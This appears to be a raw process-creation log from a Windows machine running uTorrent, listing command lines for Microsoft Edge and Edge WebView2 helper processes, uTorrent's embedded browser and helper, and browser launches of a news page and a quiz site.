--webview-exe-name=utorrentie.exe --embedded-browser-webview=1 --embedded-browser-webview-dpi-awareness=0 --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2992 /prefetch:1
C:\Program Files (x86)\Microsoft\EdgeWebView\Application\90.0.818.66\msedgewebview2.exe
"C:\Program Files (x86)\Microsoft\EdgeWebView\Application\90.0.818.66\msedgewebview2.exe" --type=renderer --js-flags="--harmony-weak-refs-with-cleanup-some --expose-gc" --field-trial-handle=1860,12469116650817951988,14240505516930928696,131072 --enable-features=ForwardMemoryPressureEventsToGpuProcess,UseSwapChainsInSoftware --disable-features=FilterAdsOnAbusiveSites,SpareRendererForSitePerProcess,WebPayments,msApplicationGuard,msAutomaticTabFreeze,msBrowserSettingsSupported,msEdgeFaviconService,msEdgeLinkDoctor,msEdgeMGPFrev1,msEdgeOnRampFRE,msEdgeOnRampImport,msEdgeReadingView,msEdgeSettingsImport,msEdgeSettingsImportV2,msEdgeShoppingUI,msEdgeTranslate,msEdgeUseCaptivePortalService,msEnhancedTrackingPreventionEnabled,msImplicitSignin,msPasswordBreachDetection,msReadAloud,msRevokeExtensions,msSendClientDataHeader,msSendClientDataHeaderToEdgeServices,msSyncEdgeCollections,msUseLabelingService,msWebAssistHistorySearch --lang=en-US --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\LocalLow\uTorrent.WebView2\EBWebView" --webview-exe-name=utorrentie.exe --embedded-browser-webview=1 --embedded-browser-webview-dpi-awareness=0 --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3324 /prefetch:1
C:\Program Files (x86)\Microsoft\EdgeWebView\Application\90.0.818.66\msedgewebview2.exe
"C:\Program Files (x86)\Microsoft\EdgeWebView\Application\90.0.818.66\msedgewebview2.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1736,17033338692039194756,8420424883979609974,131072 --enable-features=ForwardMemoryPressureEventsToGpuProcess,UseSwapChainsInSoftware --disable-features=FilterAdsOnAbusiveSites,SpareRendererForSitePerProcess,WebPayments,msApplicationGuard,msAutomaticTabFreeze,msBrowserSettingsSupported,msEdgeFaviconService,msEdgeLinkDoctor,msEdgeMGPFrev1,msEdgeOnRampFRE,msEdgeOnRampImport,msEdgeReadingView,msEdgeSettingsImport,msEdgeSettingsImportV2,msEdgeShoppingUI,msEdgeTranslate,msEdgeUseCaptivePortalService,msEnhancedTrackingPreventionEnabled,msImplicitSignin,msPasswordBreachDetection,msReadAloud,msRevokeExtensions,msSendClientDataHeader,msSendClientDataHeaderToEdgeServices,msSyncEdgeCollections,msUseLabelingService,msWebAssistHistorySearch --lang=en-US --service-sandbox-type=none --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\LocalLow\uTorrent.WebView2\EBWebView" --webview-exe-name=utorrentie.exe --embedded-browser-webview=1 --embedded-browser-webview-dpi-awareness=0 --mojo-platform-channel-handle=1924 /prefetch:3
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://utorrent.com/prodnews?v=3%2e6%2e0%2e1%2e47142&pv=0.0.0.0.0
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=90.0.818.66 --initial-client-data=0x100,0x104,0x108,0x80,0x10c,0x7fffcb093cb8,0x7fffcb093cc8,0x7fffcb093cd8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1860,2911207103318577068,16792507121962570219,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1876 /prefetch:2
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1860,2911207103318577068,16792507121962570219,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2008 /prefetch:3
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1860,2911207103318577068,16792507121962570219,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2688 /prefetch:8
C:\Program Files (x86)\Microsoft\EdgeWebView\Application\90.0.818.66\msedgewebview2.exe
"C:\Program Files (x86)\Microsoft\EdgeWebView\Application\90.0.818.66\msedgewebview2.exe" --type=renderer --js-flags="--harmony-weak-refs-with-cleanup-some --expose-gc" --field-trial-handle=1860,12469116650817951988,14240505516930928696,131072 --enable-features=ForwardMemoryPressureEventsToGpuProcess,UseSwapChainsInSoftware --disable-features=FilterAdsOnAbusiveSites,SpareRendererForSitePerProcess,WebPayments,msApplicationGuard,msAutomaticTabFreeze,msBrowserSettingsSupported,msEdgeFaviconService,msEdgeLinkDoctor,msEdgeMGPFrev1,msEdgeOnRampFRE,msEdgeOnRampImport,msEdgeReadingView,msEdgeSettingsImport,msEdgeSettingsImportV2,msEdgeShoppingUI,msEdgeTranslate,msEdgeUseCaptivePortalService,msEnhancedTrackingPreventionEnabled,msImplicitSignin,msPasswordBreachDetection,msReadAloud,msRevokeExtensions,msSendClientDataHeader,msSendClientDataHeaderToEdgeServices,msSyncEdgeCollections,msUseLabelingService,msWebAssistHistorySearch --lang=en-US --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\LocalLow\uTorrent.WebView2\EBWebView" --webview-exe-name=utorrentie.exe --embedded-browser-webview=1 --embedded-browser-webview-dpi-awareness=0 --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4056 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1860,2911207103318577068,16792507121962570219,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3220 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1860,2911207103318577068,16792507121962570219,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3228 /prefetch:1
C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1860,2911207103318577068,16792507121962570219,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5024 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1860,2911207103318577068,16792507121962570219,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4656 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=1860,2911207103318577068,16792507121962570219,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5308 /prefetch:8
C:\Program Files (x86)\Microsoft\EdgeWebView\Application\90.0.818.66\msedgewebview2.exe
"C:\Program Files (x86)\Microsoft\EdgeWebView\Application\90.0.818.66\msedgewebview2.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --field-trial-handle=1860,12469116650817951988,14240505516930928696,131072 --enable-features=ForwardMemoryPressureEventsToGpuProcess,UseSwapChainsInSoftware --disable-features=FilterAdsOnAbusiveSites,SpareRendererForSitePerProcess,WebPayments,msApplicationGuard,msAutomaticTabFreeze,msBrowserSettingsSupported,msEdgeFaviconService,msEdgeLinkDoctor,msEdgeMGPFrev1,msEdgeOnRampFRE,msEdgeOnRampImport,msEdgeReadingView,msEdgeSettingsImport,msEdgeSettingsImportV2,msEdgeShoppingUI,msEdgeTranslate,msEdgeUseCaptivePortalService,msEnhancedTrackingPreventionEnabled,msImplicitSignin,msPasswordBreachDetection,msReadAloud,msRevokeExtensions,msSendClientDataHeader,msSendClientDataHeaderToEdgeServices,msSyncEdgeCollections,msUseLabelingService,msWebAssistHistorySearch --lang=en-US --service-sandbox-type=entity_extraction --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\LocalLow\uTorrent.WebView2\EBWebView" --webview-exe-name=utorrentie.exe --embedded-browser-webview=1 --embedded-browser-webview-dpi-awareness=0 --mojo-platform-channel-handle=4980 /prefetch:8
C:\Users\Admin\AppData\Roaming\uTorrent\updates\3.6.0_47142\utorrentie.exe
"C:\Users\Admin\AppData\Roaming\uTorrent\updates\3.6.0_47142\utorrentie.exe" uTorrent_2008_03CB6550_606735135 µTorrent4823DF041B09 uTorrent ce unp
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://play2330.atmequiz.com/start
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=90.0.818.66 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7fffcb093cb8,0x7fffcb093cc8,0x7fffcb093cd8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1860,2911207103318577068,16792507121962570219,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5432 /prefetch:1
C:\Program Files (x86)\Microsoft\EdgeWebView\Application\90.0.818.66\msedgewebview2.exe
"C:\Program Files (x86)\Microsoft\EdgeWebView\Application\90.0.818.66\msedgewebview2.exe" --embedded-browser-webview=1 --webview-exe-name=utorrentie.exe --user-data-dir="C:\Users\Admin\AppData\LocalLow\uTorrent.WebView2\EBWebView" --no-default-browser-check --disable-component-extensions-with-background-pages --no-first-run --disable-default-apps --noerrdialogs --embedded-browser-webview-dpi-awareness=0 --disable-features=msEnhancedTrackingPreventionEnabled --disable-popup-blocking --internet-explorer-integration=none --js-flags="--harmony-weak-refs-with-cleanup-some --expose-gc" --mojo-named-platform-channel-pipe=4432.4316.7987634700710655576
C:\Program Files (x86)\Microsoft\EdgeWebView\Application\90.0.818.66\msedgewebview2.exe
"C:\Program Files (x86)\Microsoft\EdgeWebView\Application\90.0.818.66\msedgewebview2.exe" --type=crashpad-handler --user-data-dir=C:\Users\Admin\AppData\LocalLow\uTorrent.WebView2\EBWebView /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Users\Admin\AppData\LocalLow\uTorrent.WebView2\EBWebView\Crashpad --metrics-dir=C:\Users\Admin\AppData\LocalLow\uTorrent.WebView2\EBWebView --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\EdgeWebView\Application\90.0.818.66\msedgewebview2.exe" --annotation=plat=Win64 "--annotation=prod=Edge WebView2" --annotation=ver=90.0.818.66 --initial-client-data=0x108,0x10c,0x110,0xe4,0x1b8,0x7fffcb093cb8,0x7fffcb093cc8,0x7fffcb093cd8
C:\Program Files (x86)\Microsoft\EdgeWebView\Application\90.0.818.66\msedgewebview2.exe
"C:\Program Files (x86)\Microsoft\EdgeWebView\Application\90.0.818.66\msedgewebview2.exe" --type=gpu-process --field-trial-handle=1828,10188426019090277270,17373410644144937637,131072 --enable-features=ForwardMemoryPressureEventsToGpuProcess,UseSwapChainsInSoftware --disable-features=FilterAdsOnAbusiveSites,SpareRendererForSitePerProcess,WebPayments,msApplicationGuard,msAutomaticTabFreeze,msBrowserSettingsSupported,msEdgeFaviconService,msEdgeLinkDoctor,msEdgeMGPFrev1,msEdgeOnRampFRE,msEdgeOnRampImport,msEdgeReadingView,msEdgeSettingsImport,msEdgeSettingsImportV2,msEdgeShoppingUI,msEdgeTranslate,msEdgeUseCaptivePortalService,msEnhancedTrackingPreventionEnabled,msImplicitSignin,msPasswordBreachDetection,msReadAloud,msRevokeExtensions,msSendClientDataHeader,msSendClientDataHeaderToEdgeServices,msSyncEdgeCollections,msUseLabelingService,msWebAssistHistorySearch --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\LocalLow\uTorrent.WebView2\EBWebView" --webview-exe-name=utorrentie.exe --embedded-browser-webview=1 --embedded-browser-webview-dpi-awareness=0 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1840 /prefetch:2
C:\Program Files (x86)\Microsoft\EdgeWebView\Application\90.0.818.66\msedgewebview2.exe
"C:\Program Files (x86)\Microsoft\EdgeWebView\Application\90.0.818.66\msedgewebview2.exe" --type=renderer --js-flags="--harmony-weak-refs-with-cleanup-some --expose-gc" --field-trial-handle=1860,12469116650817951988,14240505516930928696,131072 --enable-features=ForwardMemoryPressureEventsToGpuProcess,UseSwapChainsInSoftware --disable-features=FilterAdsOnAbusiveSites,SpareRendererForSitePerProcess,WebPayments,msApplicationGuard,msAutomaticTabFreeze,msBrowserSettingsSupported,msEdgeFaviconService,msEdgeLinkDoctor,msEdgeMGPFrev1,msEdgeOnRampFRE,msEdgeOnRampImport,msEdgeReadingView,msEdgeSettingsImport,msEdgeSettingsImportV2,msEdgeShoppingUI,msEdgeTranslate,msEdgeUseCaptivePortalService,msEnhancedTrackingPreventionEnabled,msImplicitSignin,msPasswordBreachDetection,msReadAloud,msRevokeExtensions,msSendClientDataHeader,msSendClientDataHeaderToEdgeServices,msSyncEdgeCollections,msUseLabelingService,msWebAssistHistorySearch --lang=en-US --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\LocalLow\uTorrent.WebView2\EBWebView" --webview-exe-name=utorrentie.exe --embedded-browser-webview=1 --embedded-browser-webview-dpi-awareness=0 --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4272 /prefetch:1
C:\Program Files (x86)\Microsoft\EdgeWebView\Application\90.0.818.66\msedgewebview2.exe
"C:\Program Files (x86)\Microsoft\EdgeWebView\Application\90.0.818.66\msedgewebview2.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1828,10188426019090277270,17373410644144937637,131072 --enable-features=ForwardMemoryPressureEventsToGpuProcess,UseSwapChainsInSoftware --disable-features=FilterAdsOnAbusiveSites,SpareRendererForSitePerProcess,WebPayments,msApplicationGuard,msAutomaticTabFreeze,msBrowserSettingsSupported,msEdgeFaviconService,msEdgeLinkDoctor,msEdgeMGPFrev1,msEdgeOnRampFRE,msEdgeOnRampImport,msEdgeReadingView,msEdgeSettingsImport,msEdgeSettingsImportV2,msEdgeShoppingUI,msEdgeTranslate,msEdgeUseCaptivePortalService,msEnhancedTrackingPreventionEnabled,msImplicitSignin,msPasswordBreachDetection,msReadAloud,msRevokeExtensions,msSendClientDataHeader,msSendClientDataHeaderToEdgeServices,msSyncEdgeCollections,msUseLabelingService,msWebAssistHistorySearch --lang=en-US --service-sandbox-type=none --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\LocalLow\uTorrent.WebView2\EBWebView" --webview-exe-name=utorrentie.exe --embedded-browser-webview=1 --embedded-browser-webview-dpi-awareness=0 --mojo-platform-channel-handle=2188 /prefetch:3
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1860,2911207103318577068,16792507121962570219,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5440 /prefetch:1
C:\Users\Admin\AppData\Roaming\uTorrent\updates\3.6.0_47142\utorrentie.exe
"C:\Users\Admin\AppData\Roaming\uTorrent\updates\3.6.0_47142\utorrentie.exe" uTorrent_2008_03CB5BB0_1201853113 µTorrent4823DF041B09 uTorrent ce unp
C:\Program Files (x86)\Microsoft\EdgeWebView\Application\90.0.818.66\msedgewebview2.exe
"C:\Program Files (x86)\Microsoft\EdgeWebView\Application\90.0.818.66\msedgewebview2.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1860,12469116650817951988,14240505516930928696,131072 --enable-features=ForwardMemoryPressureEventsToGpuProcess,UseSwapChainsInSoftware --disable-features=FilterAdsOnAbusiveSites,SpareRendererForSitePerProcess,WebPayments,msApplicationGuard,msAutomaticTabFreeze,msBrowserSettingsSupported,msEdgeFaviconService,msEdgeLinkDoctor,msEdgeMGPFrev1,msEdgeOnRampFRE,msEdgeOnRampImport,msEdgeReadingView,msEdgeSettingsImport,msEdgeSettingsImportV2,msEdgeShoppingUI,msEdgeTranslate,msEdgeUseCaptivePortalService,msEnhancedTrackingPreventionEnabled,msImplicitSignin,msPasswordBreachDetection,msReadAloud,msRevokeExtensions,msSendClientDataHeader,msSendClientDataHeaderToEdgeServices,msSyncEdgeCollections,msUseLabelingService,msWebAssistHistorySearch --lang=en-US --service-sandbox-type=none --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\LocalLow\uTorrent.WebView2\EBWebView" --webview-exe-name=utorrentie.exe --embedded-browser-webview=1 --embedded-browser-webview-dpi-awareness=0 --mojo-platform-channel-handle=5588 /prefetch:8
C:\Program Files (x86)\Microsoft\EdgeWebView\Application\90.0.818.66\msedgewebview2.exe
"C:\Program Files (x86)\Microsoft\EdgeWebView\Application\90.0.818.66\msedgewebview2.exe" --embedded-browser-webview=1 --webview-exe-name=utorrentie.exe --user-data-dir="C:\Users\Admin\AppData\LocalLow\uTorrent.WebView2\EBWebView" --no-default-browser-check --disable-component-extensions-with-background-pages --no-first-run --disable-default-apps --noerrdialogs --embedded-browser-webview-dpi-awareness=0 --disable-features=msEnhancedTrackingPreventionEnabled --disable-popup-blocking --internet-explorer-integration=none --js-flags="--harmony-weak-refs-with-cleanup-some --expose-gc" --mojo-named-platform-channel-pipe=2776.3304.11164077774771384500
C:\Program Files (x86)\Microsoft\EdgeWebView\Application\90.0.818.66\msedgewebview2.exe
"C:\Program Files (x86)\Microsoft\EdgeWebView\Application\90.0.818.66\msedgewebview2.exe" --type=crashpad-handler --user-data-dir=C:\Users\Admin\AppData\LocalLow\uTorrent.WebView2\EBWebView /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Users\Admin\AppData\LocalLow\uTorrent.WebView2\EBWebView\Crashpad --metrics-dir=C:\Users\Admin\AppData\LocalLow\uTorrent.WebView2\EBWebView --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\EdgeWebView\Application\90.0.818.66\msedgewebview2.exe" --annotation=plat=Win64 "--annotation=prod=Edge WebView2" --annotation=ver=90.0.818.66 --initial-client-data=0x108,0x10c,0x110,0xe4,0x1b8,0x7fffcb093cb8,0x7fffcb093cc8,0x7fffcb093cd8
C:\Program Files (x86)\Microsoft\EdgeWebView\Application\90.0.818.66\msedgewebview2.exe
"C:\Program Files (x86)\Microsoft\EdgeWebView\Application\90.0.818.66\msedgewebview2.exe" --type=gpu-process --field-trial-handle=1716,13157676356393165352,13459174796162396494,131072 --enable-features=ForwardMemoryPressureEventsToGpuProcess,UseSwapChainsInSoftware --disable-features=FilterAdsOnAbusiveSites,SpareRendererForSitePerProcess,WebPayments,msApplicationGuard,msAutomaticTabFreeze,msBrowserSettingsSupported,msEdgeFaviconService,msEdgeLinkDoctor,msEdgeMGPFrev1,msEdgeOnRampFRE,msEdgeOnRampImport,msEdgeReadingView,msEdgeSettingsImport,msEdgeSettingsImportV2,msEdgeShoppingUI,msEdgeTranslate,msEdgeUseCaptivePortalService,msEnhancedTrackingPreventionEnabled,msImplicitSignin,msPasswordBreachDetection,msReadAloud,msRevokeExtensions,msSendClientDataHeader,msSendClientDataHeaderToEdgeServices,msSyncEdgeCollections,msUseLabelingService,msWebAssistHistorySearch --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\LocalLow\uTorrent.WebView2\EBWebView" --webview-exe-name=utorrentie.exe --embedded-browser-webview=1 --embedded-browser-webview-dpi-awareness=0 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1776 /prefetch:2
C:\Program Files (x86)\Microsoft\EdgeWebView\Application\90.0.818.66\msedgewebview2.exe
"C:\Program Files (x86)\Microsoft\EdgeWebView\Application\90.0.818.66\msedgewebview2.exe" --type=renderer --js-flags="--harmony-weak-refs-with-cleanup-some --expose-gc" --field-trial-handle=1860,12469116650817951988,14240505516930928696,131072 --enable-features=ForwardMemoryPressureEventsToGpuProcess,UseSwapChainsInSoftware --disable-features=FilterAdsOnAbusiveSites,SpareRendererForSitePerProcess,WebPayments,msApplicationGuard,msAutomaticTabFreeze,msBrowserSettingsSupported,msEdgeFaviconService,msEdgeLinkDoctor,msEdgeMGPFrev1,msEdgeOnRampFRE,msEdgeOnRampImport,msEdgeReadingView,msEdgeSettingsImport,msEdgeSettingsImportV2,msEdgeShoppingUI,msEdgeTranslate,msEdgeUseCaptivePortalService,msEnhancedTrackingPreventionEnabled,msImplicitSignin,msPasswordBreachDetection,msReadAloud,msRevokeExtensions,msSendClientDataHeader,msSendClientDataHeaderToEdgeServices,msSyncEdgeCollections,msUseLabelingService,msWebAssistHistorySearch --lang=en-US --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\LocalLow\uTorrent.WebView2\EBWebView" --webview-exe-name=utorrentie.exe --embedded-browser-webview=1 --embedded-browser-webview-dpi-awareness=0 --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5960 /prefetch:1
C:\Program Files (x86)\Microsoft\EdgeWebView\Application\90.0.818.66\msedgewebview2.exe
"C:\Program Files (x86)\Microsoft\EdgeWebView\Application\90.0.818.66\msedgewebview2.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1716,13157676356393165352,13459174796162396494,131072 --enable-features=ForwardMemoryPressureEventsToGpuProcess,UseSwapChainsInSoftware --disable-features=FilterAdsOnAbusiveSites,SpareRendererForSitePerProcess,WebPayments,msApplicationGuard,msAutomaticTabFreeze,msBrowserSettingsSupported,msEdgeFaviconService,msEdgeLinkDoctor,msEdgeMGPFrev1,msEdgeOnRampFRE,msEdgeOnRampImport,msEdgeReadingView,msEdgeSettingsImport,msEdgeSettingsImportV2,msEdgeShoppingUI,msEdgeTranslate,msEdgeUseCaptivePortalService,msEnhancedTrackingPreventionEnabled,msImplicitSignin,msPasswordBreachDetection,msReadAloud,msRevokeExtensions,msSendClientDataHeader,msSendClientDataHeaderToEdgeServices,msSyncEdgeCollections,msUseLabelingService,msWebAssistHistorySearch --lang=en-US --service-sandbox-type=none --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\LocalLow\uTorrent.WebView2\EBWebView" --webview-exe-name=utorrentie.exe --embedded-browser-webview=1 --embedded-browser-webview-dpi-awareness=0 --mojo-platform-channel-handle=2064 /prefetch:3
C:\Users\Admin\AppData\Roaming\uTorrent\helper\helper.exe
"C:\Users\Admin\AppData\Roaming\uTorrent\helper\helper.exe" 10702 --hval 8nyQ3yqfzwaO9Vu5 -- -pid 2008 -version 47142
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1860,2911207103318577068,16792507121962570219,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5084 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1860,2911207103318577068,16792507121962570219,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3296 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1860,2911207103318577068,16792507121962570219,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3328 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1860,2911207103318577068,16792507121962570219,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5840 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1860,2911207103318577068,16792507121962570219,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5640 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1860,2911207103318577068,16792507121962570219,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5428 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
